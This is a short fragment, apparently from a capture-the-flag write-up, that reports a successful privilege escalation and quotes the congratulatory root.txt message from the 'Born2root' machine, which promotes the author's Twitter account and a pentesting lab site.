Privilege Escalation erfolgreich Flags root.txt W00t w00t ! If you are reading this text then Congratulations !!

I hope you liked the second episode of 'Born2root' if you liked it please ping me in Twitter @h4d3sw0rm .

If you want to try more boxes like this created by me , try this new sweet lab called 'Wizard-Labs' which is a platform which hosts many boot2root machines to improve your pentesting skillset https://labs.wizard-security.net !
Until we meet again :-)